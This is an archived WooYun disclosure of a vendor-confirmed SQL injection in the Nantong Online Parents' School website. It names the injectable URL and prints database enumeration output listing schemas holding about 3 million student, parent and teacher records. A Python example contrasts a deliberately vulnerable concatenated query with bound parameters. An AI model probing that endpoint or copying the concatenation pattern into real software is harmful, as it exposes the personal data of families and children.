SQL injection in Nantong Online Parents' School allows extensive cross-database queries (3 million user records involved)

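admin, 2017-04-27 07:52:48
Summary

2016-04-12: Details reported to the vendor; awaiting vendor handling
2016-04-12: Vendor confirmed; details disclosed to the vendor only
2016-04-22: Details disclosed to core white hats and experts in related fields
2016-05-02: Details disclosed to regular white hats
2016-05-12: Details disclosed to trainee white hats
2016-05-27: Details disclosed to the public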

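Vulnerability overview

Bug ID: WooYun-2016-187971

Title: SQL injection in Nantong Online Parents' School allows extensive cross-database queries (3 million user records involved)

Vendor: ntjxt.com

Reported by: 黑色键盘丶

Submitted: 2016-04-12 16:18

Published: 2016-05-27 19:10

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 11

Status: Confirmed by vendor

Source: www.wooyun.org

Tags: injection techniques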


Vulnerability details

Brief description:

As the title says.

Detailed description:

Code block:
Injection point: http://www.ntjxt.com/areas?area_id=1

Databases

Code block:
available databases [12]:
[*] COMMUNITY_ONLINE
[*] CTXSYS
[*] ESCHOOL30
[*] EXFSYS
[*] GATEWAY
[*] MDSYS
[*] OLAPSYS
[*] PARENTSCHOOL
[*] SYS
[*] SYSTEM
[*] WMSYS
[*] XUEXI6_PARENTSCHOOL

Code block:
Database: PARENTSCHOOL
+-----------------------+---------+
| Table | Entries |
+-----------------------+---------+
| SESSIONS | 11057339 |
| PAGE_RECORDS | 8907483 |
| ACTIVITY_MESSAGES | 1530992 |
| BLESSINGS | 962585 |
| BOOK_MESSAGES | 545177 |
| BOOK_ACTIVITIES | 333791 |
| LOTTERY_RECORDS | 89213 |
| ACTION_RECORDS | 85368 |
| FOCUS | 69882 |
| NEWS_LINES | 20725 |
| BOOK_EXCHANGES | 8830 |
| BOTTLE_USER_RELATIONS | 8596 |
| LINSHI | 8286 |
| PAPER_RESULTS | 5733 |
| AWARD_USER_RELATIONS | 5581 |
| BOTTLES | 4705 |
| BOOK_ACTIVITY_AWARDS | 3785 |
| QUEUE_MESSAGES | 1083 |
| QUESTIONS | 1060 |
| BOOK_AWARD_USERS | 887 |
| RESOURCES | 655 |
| SCHOOL_TYPES | 574 |
| SCHOOLS | 512 |
| AREA_NEWS | 493 |
| ARTICLES | 459 |
| BOOK_ARTICLES | 434 |
| BOOK_SETTINGS | 168 |
| LECTURE_COMMENTS | 134 |
| ARTICLE_COMMENTS | 113 |
| INDEX_SETTINGS | 86 |
| ACTIVITY_PICTURES | 74 |
| DANGERS | 68 |
| LOTTERY_SETTINGS | 61 |
| LECTURES | 52 |
| ACTIVITY_AWARDS | 36 |
| RESOURCE_TYPES | 27 |
| BEAUTIES | 23 |
| NEWS_TYPES | 23 |
| BOOK_LISTINGS | 16 |
| PAPER_OPTIONS | 10 |
| AREA_MANAGERS | 9 |
| SONGS | 8 |
| WAITING_MESSAGE_LOGS | 6 |
| PAPER_QUESTIONS | 3 |
| NOTICES | 2 |
| ACTIVITY_REPORTS | 1 |
| PAPERS | 1 |
+-----------------------+---------+

Cross-database queries are possible: more than 3 million user records

Code block:
Database: ESCHOOL30
+-------------------------+---------+
| Table | Entries |
+-------------------------+---------+
| GROUP_USER_RELATIONS | 3276581 |
| USERS | 3252938 |
| STUDENTS | 1577602 |
| PARENTS | 1565084 |
| SEND_SERVICE_RELATIONS | 333491 |
| TEACHERS | 89003 |
| WAITING_MESSAGES | 86689 |
| USER_GROUPS | 83326 |
| WAITING_MESSAGE_RECORDS | 7674 |
| SCHOOL_INFOS | 934 |
+-------------------------+---------+

Fix:

Filter the input.
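
What filtering means in practice for a numeric parameter such as `area_id`, shown as an added example that is not code from the report or the vendor: the concatenated query next to a version that validates the value against an allow-list and passes it as a bind parameter. It uses an in-memory SQLite database as a stand-in; the `areas` table, its rows and all function names are assumptions made for illustration.

```python
import sqlite3


def make_db():
    # Constructed sample data; table and column names are hypothetical.
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE areas (area_id INTEGER PRIMARY KEY, name TEXT);
        INSERT INTO areas VALUES (1, 'area-one'), (2, 'area-two'), (3, 'area-three');
        """
    )
    return db


def areas_concatenated(db, raw_area_id):
    # Vulnerable pattern: the request value becomes part of the SQL text,
    # so anything after the number is parsed as SQL.
    sql = "SELECT area_id, name FROM areas WHERE area_id = " + raw_area_id
    return db.execute(sql).fetchall()


def parse_area_id(raw):
    # Allow-list validation: ASCII decimal digits only, bounded length.
    if not (isinstance(raw, str) and raw.isascii() and raw.isdigit() and len(raw) <= 9):
        raise ValueError("area_id must be a decimal integer")
    return int(raw)


def areas_bound(db, raw_area_id):
    # Hardened pattern: validate first, then send the value as a bind
    # parameter so it can never change the structure of the statement.
    area_id = parse_area_id(raw_area_id)
    sql = "SELECT area_id, name FROM areas WHERE area_id = ?"
    return db.execute(sql, (area_id,)).fetchall()


def areas_bound_unvalidated(db, raw_area_id):
    # Binding alone already keeps the value as data: a malformed value
    # simply matches no row instead of rewriting the query.
    sql = "SELECT area_id, name FROM areas WHERE area_id = ?"
    return db.execute(sql, (raw_area_id,)).fetchall()
```

The report shows queries reaching schemas other than the application's own, so restricting the application's database account to the objects it needs limits what one flawed query can read.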

Copyright notice: when reposting, please credit the source 黑色键盘丶@乌云 (WooYun)


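Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 20

Confirmed: 2016-04-12 19:05

Vendor reply:

Some of this has not been maintained since 2011; there is indeed a vulnerability.

Latest status:

None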
